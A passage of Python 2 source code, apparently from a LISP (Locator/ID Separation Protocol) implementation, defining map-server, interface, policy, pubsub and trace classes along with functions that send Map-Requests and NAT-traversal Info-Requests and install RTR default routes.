    def add_source_entry(self, source_ref):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ref.eid, source_ref)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return(None)
        return(self.source_cache.lookup_cache(source, exact))
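#
# lisp_referral_node
#
# One node of a referral set: the node's RLOC, up/down status, and its
# priority/weight for selection.
#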
class lisp_referral_node():
    def __init__(self):
        self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.priority = 0
        self.weight = 0
        self.updown = True
        self.map_requests_sent = 0
        self.no_responses = 0
        self.uptime = lisp_get_timestamp()

    def print_ref_node(self, indent):
        uts = lisp_print_elapsed(self.uptime)
        lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format(
            indent, red(self.referral_address.print_address(), False), uts,
            "up" if self.updown else "down", self.priority, self.weight))
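#
# lisp_ms
#
# One Map-Server entry: authentication material (alg-id/key-id/password),
# registration policy flags (proxy-reply, merge/refresh registrations,
# want-map-notify), and Map-Register statistics. Note all map-servers share
# the xtr-id of the first entry created.
#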
class lisp_ms():
    def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
        mr, rr, wmn, site_id, ekey_id, ekey):
        self.ms_name = ms_name if (ms_name != None) else "all"
        self.dns_name = dns_name
        self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0
        if (lisp_map_servers_list == {}):
            self.xtr_id = lisp_get_control_nonce()
        else:
            self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
        self.alg_id = alg_id
        self.key_id = key_id
        self.password = pw
        self.proxy_reply = pr
        self.merge_registrations = mr
        self.refresh_registrations = rr
        self.want_map_notify = wmn
        self.site_id = site_id
        self.map_registers_sent = 0
        self.map_registers_multicast_sent = 0
        self.map_notifies_received = 0
        self.map_notify_acks_sent = 0
        self.ekey_id = ekey_id
        self.ekey = ekey
        if (addr_str):
            self.map_server.store_address(addr_str)
            self.insert_ms()
        else:
            self.resolve_dns_name()
    def resolve_dns_name(self):
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return

        try:
            answer = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = answer[2]
        except:
            return

        #
        # If the A-record this entry was using is gone, remove the entry.
        #
        if (len(a_records) <= self.a_record_index):
            self.delete_ms()
            return

        addr = a_records[self.a_record_index]
        if (addr != self.map_server.print_address_no_iid()):
            self.delete_ms()
            self.map_server.store_address(addr)
            self.insert_ms()

        #
        # For a LISP-Decent DNS suffix, the first entry clones itself for
        # each of the other A-records returned.
        #
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return

        for addr in a_records[1::]:
            a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
            ms = lisp_get_map_server(a)
            if (ms != None and ms.a_record_index == a_records.index(addr)):
                continue
            ms = copy.deepcopy(self)
            ms.map_server.store_address(addr)
            ms.a_record_index = a_records.index(addr)
            ms.last_dns_resolve = lisp_get_timestamp()
            ms.insert_ms()

        #
        # Remove entries whose addresses no longer appear in the A-records.
        #
        delete_list = []
        for ms in lisp_map_servers_list.values():
            if (self.dns_name != ms.dns_name): continue
            addr_str = ms.map_server.print_address_no_iid()
            if (addr_str in a_records): continue
            delete_list.append(ms)

        for ms in delete_list: ms.delete_ms()
    def insert_ms(self):
        key = self.ms_name + self.map_server.print_address()
        lisp_map_servers_list[key] = self

    def delete_ms(self):
        key = self.ms_name + self.map_server.print_address()
        if (lisp_map_servers_list.has_key(key) == False): return
        lisp_map_servers_list.pop(key)
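#
# lisp_interface
#
# Per-device state: instance-id, raw and bridge sockets, and the optional
# dynamic-EID and multi-tenant EID prefixes configured on the interface.
#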
class lisp_interface():
    def __init__(self, device):
        self.interface_name = ""
        self.device = device
        self.instance_id = None
        self.bridge_socket = None
        self.raw_socket = None
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dynamic_eid_device = None
        self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
        self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def add_interface(self):
        lisp_myinterfaces[self.device] = self

    def get_instance_id(self):
        return(self.instance_id)

    def get_socket(self):
        return(self.raw_socket)

    def get_bridge_socket(self):
        return(self.bridge_socket)

    def does_dynamic_eid_match(self, eid):
        if (self.dynamic_eid.is_null()): return(False)
        return(eid.is_more_specific(self.dynamic_eid))
    def set_socket(self, device):
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW,
            socket.IPPROTO_RAW)
        s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
        except:
            s.close()
            s = None
        self.raw_socket = s

    def set_bridge_socket(self, device):
        s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
        try:
            # socket.bind() returns None, so don't assign its result; the
            # original assigned the return value, leaving bridge_socket None.
            s.bind((device, 0))
            self.bridge_socket = s
        except:
            return
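#
# lisp_datetime
#
# Wraps a "YYYY-MM-DD-HH:MM:SS" string and also stores it as an integer so
# datetimes compare with ordinary relational operators. Illustrative sketch
# (not in the original source):
#
#   lower = lisp_datetime("2020-01-01-00:00:00")
#   upper = lisp_datetime("2030-01-01-00:00:00")
#   in_window = lower.now_in_range(upper)
#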
class lisp_datetime():
    def __init__(self, datetime_str):
        self.datetime_name = datetime_str
        self.datetime = None
        self.parse_datetime()

    def valid_datetime(self):
        ds = self.datetime_name
        if (ds.find(":") == -1): return(False)
        if (ds.find("-") == -1): return(False)
        year, month, day, time_str = ds[0:4], ds[5:7], ds[8:10], ds[11::]

        if ((year + month + day).isdigit() == False): return(False)
        if (month < "01" or month > "12"): return(False)
        if (day < "01" or day > "31"): return(False)

        hour, minute, second = time_str.split(":")

        if ((hour + minute + second).isdigit() == False): return(False)
        if (hour < "00" or hour > "23"): return(False)
        if (minute < "00" or minute > "59"): return(False)
        if (second < "00" or second > "59"): return(False)
        return(True)
    def parse_datetime(self):
        datetime_str = self.datetime_name
        datetime_str = datetime_str.replace("-", "")
        datetime_str = datetime_str.replace(":", "")
        self.datetime = int(datetime_str)

    def now(self):
        now = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
        now = lisp_datetime(now)
        return(now)

    def print_datetime(self):
        return(self.datetime_name)

    def future(self):
        return(self.datetime > self.now().datetime)

    def past(self):
        return(self.future() == False)

    def now_in_range(self, upper):
        return(self.past() and upper.future())

    def this_year(self):
        now = str(self.now().datetime)[0:4]
        this = str(self.datetime)[0:4]
        return(this == now)

    def this_month(self):
        now = str(self.now().datetime)[0:6]
        this = str(self.datetime)[0:6]
        return(this == now)

    def today(self):
        now = str(self.now().datetime)[0:8]
        this = str(self.datetime)[0:8]
        return(this == now)
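#
# lisp_policy_match / lisp_policy
#
# A policy is a list of match clauses (source/dest EID and RLOC prefixes,
# record names, and a datetime range) plus "set-" actions that are applied
# to a matching Map-Request or Map-Reply.
#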
class lisp_policy_match():
    def __init__(self):
        self.source_eid = None
        self.dest_eid = None
        self.source_rloc = None
        self.dest_rloc = None
        self.rloc_record_name = None
        self.geo_name = None
        self.elp_name = None
        self.rle_name = None
        self.json_name = None
        self.datetime_lower = None
        self.datetime_upper = None

class lisp_policy():
    def __init__(self, policy_name):
        self.policy_name = policy_name
        self.match_clauses = []
        self.set_action = None
        self.set_record_ttl = None
        self.set_source_eid = None
        self.set_dest_eid = None
        self.set_rloc_address = None
        self.set_rloc_record_name = None
        self.set_geo_name = None
        self.set_elp_name = None
        self.set_rle_name = None
        self.set_json_name = None
    def match_policy_map_request(self, mr, srloc):
        for match in self.match_clauses:
            prefix = match.source_eid
            addr = mr.source_eid
            if (prefix and addr and
                addr.is_more_specific(prefix) == False): continue

            prefix = match.dest_eid
            addr = mr.target_eid
            if (prefix and addr and
                addr.is_more_specific(prefix) == False): continue

            prefix = match.source_rloc
            addr = srloc
            if (prefix and addr and
                addr.is_more_specific(prefix) == False): continue

            lower = match.datetime_lower
            upper = match.datetime_upper
            if (lower and upper and lower.now_in_range(upper) == False):
                continue
            return(True)
        return(False)
    def set_policy_map_reply(self):
        nothing_to_set = (self.set_rloc_address == None and
            self.set_rloc_record_name == None and
            self.set_geo_name == None and self.set_elp_name == None and
            self.set_rle_name == None)
        if (nothing_to_set): return(None)

        rloc = lisp_rloc()
        if (self.set_rloc_address):
            rloc.rloc.copy_address(self.set_rloc_address)
            addr = rloc.rloc.print_address_no_iid()
            lprint("Policy set-rloc-address to {}".format(addr))

        if (self.set_rloc_record_name):
            rloc.rloc_name = self.set_rloc_record_name
            name = blue(rloc.rloc_name, False)
            lprint("Policy set-rloc-record-name to {}".format(name))

        if (self.set_geo_name):
            rloc.geo_name = self.set_geo_name
            name = rloc.geo_name
            not_found = "" if lisp_geo_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-geo-name '{}' {}".format(name, not_found))

        if (self.set_elp_name):
            rloc.elp_name = self.set_elp_name
            name = rloc.elp_name
            not_found = "" if lisp_elp_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-elp-name '{}' {}".format(name, not_found))

        if (self.set_rle_name):
            rloc.rle_name = self.set_rle_name
            name = rloc.rle_name
            not_found = "" if lisp_rle_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-rle-name '{}' {}".format(name, not_found))

        if (self.set_json_name):
            rloc.json_name = self.set_json_name
            name = rloc.json_name
            not_found = "" if lisp_json_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-json-name '{}' {}".format(name, not_found))
        return(rloc)
    def save_policy(self):
        lisp_policies[self.policy_name] = self
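#
# lisp_pubsub
#
# Subscription state for pubsub Map-Requests: the subscribing ITR, its port,
# nonce, xtr-id, and TTL. Entries live in lisp_pubsub_cache, keyed first by
# EID-prefix and then by xtr-id.
#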
class lisp_pubsub():
    def __init__(self, itr, port, nonce, ttl, xtr_id):
        self.itr = itr
        self.port = port
        self.nonce = nonce
        self.uptime = lisp_get_timestamp()
        self.ttl = ttl
        self.xtr_id = xtr_id
        self.map_notify_count = 0

    def add(self, eid_prefix):
        ttl = self.ttl
        eid = eid_prefix.print_prefix()
        if (lisp_pubsub_cache.has_key(eid) == False):
            lisp_pubsub_cache[eid] = {}
        pubsub = lisp_pubsub_cache[eid]

        action = "Add"
        if (pubsub.has_key(self.xtr_id)):
            action = "Replace"
            del(pubsub[self.xtr_id])
        pubsub[self.xtr_id] = self

        eid = green(eid, False)
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(action,
            eid, itr, xtr_id, ttl))

    def delete(self, eid_prefix):
        eid = eid_prefix.print_prefix()
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        if (lisp_pubsub_cache.has_key(eid)):
            pubsub = lisp_pubsub_cache[eid]
            if (pubsub.has_key(self.xtr_id)):
                pubsub.pop(self.xtr_id)
                lprint("Remove pubsub state {} for {}, xtr-id: {}".format(
                    eid, itr, xtr_id))
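#
# lisp_trace
#
# LISP-Trace message support. On the wire: a 4-byte word with 0x9 in the
# high nibble and the local port in the low 16 bits, a 4-byte local RLOC,
# an 8-byte nonce, then an optional JSON payload of accumulated hop records.
#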
class lisp_trace():
    def __init__(self):
        self.nonce = lisp_get_control_nonce()
        self.packet_json = []
        self.local_rloc = None
        self.local_port = None
        self.lisp_socket = None

    def print_trace(self):
        trace = self.packet_json
        lprint("LISP-Trace JSON: '{}'".format(trace))

    def encode(self):
        first_long = socket.htonl(0x90000000)
        packet = struct.pack("II", first_long, 0)
        packet += struct.pack("Q", self.nonce)
        packet += json.dumps(self.packet_json)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)
        first_long = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        first_long = socket.ntohl(first_long)
        if ((first_long & 0xff000000) != 0x90000000): return(False)

        if (len(packet) < format_size): return(False)
        addr = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]

        addr = socket.ntohl(addr)
        byte1 = addr >> 24
        byte2 = (addr >> 16) & 0xff
        byte3 = (addr >> 8) & 0xff
        byte4 = addr & 0xff
        self.local_rloc = "{}.{}.{}.{}".format(byte1, byte2, byte3, byte4)
        self.local_port = str(first_long & 0xffff)

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)
        self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (len(packet) == 0): return(True)

        try:
            self.packet_json = json.loads(packet)
        except:
            return(False)
        return(True)

    def myeid(self, eid):
        return(lisp_is_myeid(eid))
    def return_to_sender(self, lisp_socket, rts_rloc, packet):
        rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
        if (rloc == None):
            rloc, port = rts_rloc.split(":")
            port = int(port)
            lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
        else:
            lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
                port))

        if (lisp_socket == None):
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.bind(("0.0.0.0", LISP_TRACE_PORT))
            s.sendto(packet, (rloc, port))
            s.close()
        else:
            lisp_socket.sendto(packet, (rloc, port))

    def packet_length(self):
        udp_length = 8; trace_length = 4 + 4 + 8
        return(udp_length + trace_length + len(json.dumps(self.packet_json)))

    def rtr_cache_nat_trace(self, translated_rloc, translated_port):
        key = self.local_rloc + ":" + self.local_port
        value = (translated_rloc, translated_port)
        lisp_rtr_nat_trace_cache[key] = value
        lprint("Cache NAT Trace addresses {} -> {}".format(key, value))

    def rtr_cache_nat_trace_find(self, local_rloc_and_port):
        key = local_rloc_and_port
        try: value = lisp_rtr_nat_trace_cache[key]
        except: value = (None, None)
        return(value)
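#
# The lookup helpers below select entries from the global map-server and
# map-resolver lists maintained by the lisp_ms and lisp_mr classes above.
#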
def lisp_get_map_server(address):
    for ms in lisp_map_servers_list.values():
        if (ms.map_server.is_exact_match(address)): return(ms)
    return(None)

def lisp_get_any_map_server():
    for ms in lisp_map_servers_list.values(): return(ms)
    return(None)
def lisp_get_map_resolver(address, eid):
    if (address != None):
        addr_str = address.print_address()
        mr = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr_str) == -1): continue
            mr = lisp_map_resolvers_list[key]
        return(mr)

    #
    # Select by name: "" means any map-resolver, None means name "all",
    # otherwise use the mr-name from the database-mapping for the EID.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name

    #
    # Among matching entries, return the least recently used one.
    #
    best_mr = None
    for mr in lisp_map_resolvers_list.values():
        if (mr_name == ""): return(mr)
        if (mr.mr_name != mr_name): continue
        if (best_mr == None or mr.last_used < best_mr.last_used):
            best_mr = mr
    return(best_mr)
def lisp_get_decent_map_resolver(eid):
    index = lisp_get_decent_index(eid)
    dns_name = str(index) + "." + lisp_decent_dns_suffix

    lprint("Use LISP-Decent map-resolver {} for EID {}".format(
        bold(dns_name, False), eid.print_prefix()))

    best_mr = None
    for mr in lisp_map_resolvers_list.values():
        if (dns_name != mr.dns_name): continue
        if (best_mr == None or mr.last_used < best_mr.last_used):
            best_mr = mr
    return(best_mr)
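#
# Data-plane input checks. Each lisp_<afi>_input() routine validates the
# inner header and decrements its TTL/hop-limit before the packet is
# encapsulated.
#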
def lisp_ipv4_input(packet):
    #
    # Protocol 2 is IGMP; pass those up unmodified.
    #
    if (ord(packet[9]) == 2): return([True, packet])

    #
    # Verify the IPv4 header checksum. A received checksum of 0 is logged
    # but accepted.
    #
    checksum = struct.unpack("H", packet[10:12])[0]
    if (checksum == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        packet = lisp_ip_checksum(packet)
        checksum = struct.unpack("H", packet[10:12])[0]
        if (checksum != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return([False, None])

    #
    # Check and decrement the TTL, then zero and recompute the checksum.
    #
    ttl = struct.unpack("B", packet[8:9])[0]
    if (ttl == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return([False, None])
    elif (ttl == 1):
        dprint("IPv4 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return([False, None])

    ttl -= 1
    packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return([False, packet])
def lisp_ipv6_input(packet):
    dest = packet.inner_dest
    packet = packet.packet

    #
    # Check and decrement the hop-limit.
    #
    hop_limit = struct.unpack("B", packet[7:8])[0]
    if (hop_limit == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return(None)
    elif (hop_limit == 1):
        dprint("IPv6 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return(None)

    #
    # Never encapsulate packets destined to link-local addresses.
    #
    if (dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return(None)

    hop_limit -= 1
    packet = packet[0:7] + struct.pack("B", hop_limit) + packet[8::]
    return(packet)
def lisp_mac_input(packet):
    return(packet)
def lisp_rate_limit_map_request(dest):
    now = lisp_get_timestamp()

    #
    # For a window after startup, Map-Requests are not rate-limited at all.
    #
    elapsed = now - lisp_no_map_request_rate_limit
    if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
        secs = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
        dprint("No Rate-Limit Mode for another {} secs".format(secs))
        return(False)

    #
    # Otherwise rate-limit based on when the last Map-Request was sent.
    #
    if (lisp_last_map_request_sent == None): return(False)
    elapsed = now - lisp_last_map_request_sent
    rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)

    if (rate_limit):
        dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format(
            green(dest.print_address(), False), round(elapsed, 3)))
    return(rate_limit)
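#
# lisp_send_map_request
#
# Build and send a Map-Request for 'deid'. With 'rloc' supplied the request
# is an RLOC-probe sent directly (or encapsulated to the RTR when the target
# is behind a NAT); otherwise it is wrapped in an ECM and sent to a selected
# map-resolver.
#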
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
    global lisp_last_map_request_sent

    #
    # If 'rloc' is supplied this is an RLOC-probe; note the probe
    # destination address and port.
    #
    probe_dest = probe_port = None
    if (rloc):
        probe_dest = rloc.rloc
        probe_port = rloc.translated_port if lisp_i_am_rtr else \
            LISP_DATA_PORT

    #
    # Get our local RLOCs to use as ITR-RLOCs.
    #
    itr_rloc4, itr_rloc6, device = lisp_myrlocs
    if (itr_rloc4 == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return
    if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return

    map_request = lisp_map_request()
    map_request.record_count = 1
    map_request.nonce = lisp_get_control_nonce()
    map_request.rloc_probe = (probe_dest != None)

    if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce

    multicast = deid.is_multicast_address()
    if (multicast):
        map_request.target_eid = seid
        map_request.target_group = deid
    else:
        map_request.target_eid = deid

    #
    # Sign the Map-Request when a signature-EID is configured; RLOC-probes
    # are never signed.
    #
    if (map_request.rloc_probe == False):
        db = lisp_get_signature_eid()
        if (db):
            map_request.signature_eid.copy_address(db.eid)
            map_request.privkey_filename = "./lisp-sig.pem"

    if (seid == None or multicast):
        map_request.source_eid.afi = LISP_AFI_NONE
    else:
        map_request.source_eid = seid

    #
    # Behind a NAT, probes to non-private addresses must use our translated
    # RLOC as the ITR-RLOC.
    #
    if (probe_dest != None and lisp_nat_traversal and
        lisp_i_am_rtr == False):
        if (probe_dest.is_private_address() == False):
            itr_rloc4 = lisp_get_any_translated_rloc()
            if (itr_rloc4 == None):
                lprint("Suppress sending Map-Request, translated RLOC " + \
                    "not found")
                return

    #
    # Build the ITR-RLOCs list.
    #
    if (probe_dest == None or probe_dest.is_ipv4()):
        if (lisp_nat_traversal and probe_dest == None):
            translated = lisp_get_any_translated_rloc()
            if (translated != None): itr_rloc4 = translated
        map_request.itr_rlocs.append(itr_rloc4)

    if (probe_dest == None or probe_dest.is_ipv6()):
        if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
            itr_rloc6 = None
        else:
            map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
            map_request.itr_rlocs.append(itr_rloc6)

    #
    # Pick the address used as the inner source of the ECM.
    #
    if (probe_dest != None and map_request.itr_rlocs != []):
        itr_rloc = map_request.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            itr_rloc = itr_rloc4
        elif (deid.is_ipv6()):
            itr_rloc = itr_rloc6
        else:
            itr_rloc = itr_rloc4

    packet = map_request.encode(probe_dest, probe_port)
    map_request.print_map_request()

    #
    # RLOC-probes go directly to the RLOC; if the RLOC is behind a NAT the
    # probe is encapsulated to its RTR.
    #
    if (probe_dest != None):
        if (rloc.is_rloc_translated()):
            nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)

            #
            # No NAT state; glean one from the RLOC entry itself.
            #
            if (nat_info == None):
                addr_str = rloc.rloc.print_address_no_iid()
                hostname = "gleaned-{}".format(addr_str)
                port = rloc.translated_port
                nat_info = lisp_nat_info(addr_str, hostname, port)
            lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
                packet)
            return

        addr_str = probe_dest.print_address_no_iid()
        dest = lisp_convert_4to6(addr_str)
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        return

    #
    # Select a map-resolver and send the Map-Request to it in an ECM.
    #
    local_seid = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        mr = lisp_get_decent_map_resolver(deid)
    else:
        mr = lisp_get_map_resolver(None, local_seid)
    if (mr == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format(
            green(seid.print_address(), False)))
        return

    mr.last_used = lisp_get_timestamp()
    mr.map_requests_sent += 1
    if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce

    if (seid == None): seid = itr_rloc
    lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
        mr.map_resolver)

    lisp_last_map_request_sent = lisp_get_timestamp()

    #
    # Re-resolve the map-resolver's DNS name if it is due.
    #
    mr.resolve_dns_name()
    return
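#
# lisp_send_info_request
#
# Send a NAT-traversal Info-Request to 'dest'. When a device name is given,
# a temporary host route may be installed so the request leaves through that
# device; the route is removed (and any previous one restored) afterwards.
#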
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
    #
    # Build the Info-Request.
    #
    info = lisp_info()
    info.nonce = lisp_get_control_nonce()
    if (device_name): info.hostname += "-" + device_name

    dest_str = dest.print_address_no_iid()

    #
    # When sending out a specific device, install a temporary host route so
    # the Info-Request leaves through that device.
    #
    installed_host_route = False
    if (device_name):
        saved_nh = lisp_get_host_route_next_hop(dest_str)

        #
        # For the control port, wait for an existing host route to go away
        # before installing our own.
        #
        if (port == LISP_CTRL_PORT and saved_nh != None):
            while (True):
                time.sleep(.01)
                saved_nh = lisp_get_host_route_next_hop(dest_str)
                if (saved_nh == None): break

        for device, nh in lisp_get_default_route_next_hops():
            if (device != device_name): continue

            if (saved_nh != nh):
                if (saved_nh != None):
                    lisp_install_host_route(dest_str, saved_nh, False)
                lisp_install_host_route(dest_str, nh, True)
                installed_host_route = True
            break

    packet = info.encode()
    info.print_info()

    #
    # Log where the Info-Request is going.
    #
    ctrl_or_data = "(for control)" if port == LISP_CTRL_PORT else \
        "(for data)"
    ctrl_or_data = bold(ctrl_or_data, False)
    port_str = bold("{}".format(port), False)
    dest_log = red(dest_str, False)
    node = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(node, dest_log,
        port_str, ctrl_or_data))

    #
    # Control-port requests are sent as-is; data-port requests are prepended
    # with a LISP data header using instance-id 0xffffff.
    #
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    else:
        header = lisp_data_header()
        header.instance_id(0xffffff)
        header = header.encode()
        if (header):
            packet = header + packet
            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)

    #
    # Undo any routing change made above.
    #
    if (installed_host_route):
        lisp_install_host_route(dest_str, None, False)
        if (saved_nh != None):
            lisp_install_host_route(dest_str, saved_nh, True)
    return
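#
# lisp_process_info_request
#
# Decode an Info-Request, echo it back as an Info-Reply carrying the
# requester's global RLOC and source port (its NAT translation), and cache
# the source as a lisp_info_source for later NAT lookups.
#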
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):

    #
    # Parse Info-Request so the nonce can be echoed in the Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()

    #
    # Turn the request into an Info-Reply and record the requester's
    # global RLOC and translated port as seen by this node.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport

    #
    # If a hostname was supplied, echo it back as a distinguished-name.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)

    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()

    #
    # Send the Info-Reply back to the source of the Info-Request.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)

    #
    # Cache the source of the Info-Request so later Map-Requests can be
    # forwarded to it.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
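#
# The Info-Request/Info-Reply exchange above is the NAT-traversal
# bootstrap: the same lisp_info() object is decoded, flipped into a reply
# (info_reply = True), stamped with the requester's translated RLOC and
# source port as observed here, and sent straight back to that port.
#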
def lisp_get_signature_eid():
    for db in lisp_db_list:
        if (db.signature_eid): return(db)
    return(None)
def lisp_get_any_translated_port():
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_port)
    return(None)
def lisp_get_any_translated_rloc():
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_rloc)
    return(None)
def lisp_get_all_translated_rlocs():
    rloc_list = []
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.is_rloc_translated() == False): continue
            address = rloc_entry.translated_rloc.print_address_no_iid()
            rloc_list.append(address)
    return(rloc_list)
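#
# Illustrative sketch only (this helper is an assumption, not part of the
# release): how the three lookups above combine to describe an xTR's NAT
# state in one structure.
#
def lisp_example_translated_state():
    return({
        "port"  : lisp_get_any_translated_port(),    # None when not NATed
        "rloc"  : lisp_get_any_translated_rloc(),    # lisp_address or None
        "rlocs" : lisp_get_all_translated_rlocs()    # list of address strings
    })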
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Filter private RTR addresses when configured to do so.
    #
    new_rtr_list = {}
    for rtr in rtr_list:
        if (rtr == None): continue
        address = rtr_list[rtr]
        if (behind_nat and address.is_private_address()): continue
        new_rtr_list[rtr] = address
    rtr_list = new_rtr_list

    prefix_list = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break

        #
        # Unicast default entry. Remove any existing entry first, unless
        # its RLOC-set already matches the RTR list.
        #
        prefix = lisp_address(afi, "", 0, iid)
        prefix.make_default_route(prefix)
        mc = lisp_map_cache.lookup_cache(prefix, True)
        if (mc):
            if (mc.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format(
                    green(mc.print_eid_tuple(), False)))
            elif (mc.do_rloc_sets_match(rtr_list.values())):
                continue
            mc.delete_cache()

        prefix_list.append([prefix, ""])

        #
        # Multicast default entry.
        #
        group = lisp_address(afi, "", 0, iid)
        group.make_default_multicast_route(group)
        gmc = lisp_map_cache.lookup_cache(group, True)
        if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
        if (gmc): gmc.delete_cache()

        prefix_list.append([prefix, group])

    if (len(prefix_list) == 0): return

    #
    # Build an RLOC-set of all RTRs at unicast priority 254.
    #
    rloc_set = []
    for rtr in rtr_list:
        rtr_addr = rtr_list[rtr]
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(rtr_addr)
        rloc_entry.priority = 254
        rloc_entry.mpriority = 255
        rloc_entry.rloc_name = "RTR"
        rloc_set.append(rloc_entry)

    for prefix in prefix_list:
        mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
        mc.mapping_source = map_resolver
        mc.map_cache_ttl = LISP_MR_TTL * 60
        mc.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format(
            green(mc.print_eid_tuple(), False), rtr_list.keys()))

        #
        # Each map-cache entry needs its own copy of the RLOC-set.
        #
        rloc_set = copy.deepcopy(rloc_set)
    return
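#
# The entries added above are coarse default routes: any EID not covered
# by a more-specific map-cache entry is encapsulated to the RTR set at
# unicast priority 254 (mpriority 255 keeps the RTRs out of multicast
# replication), and the entries age out after LISP_MR_TTL * 60 seconds
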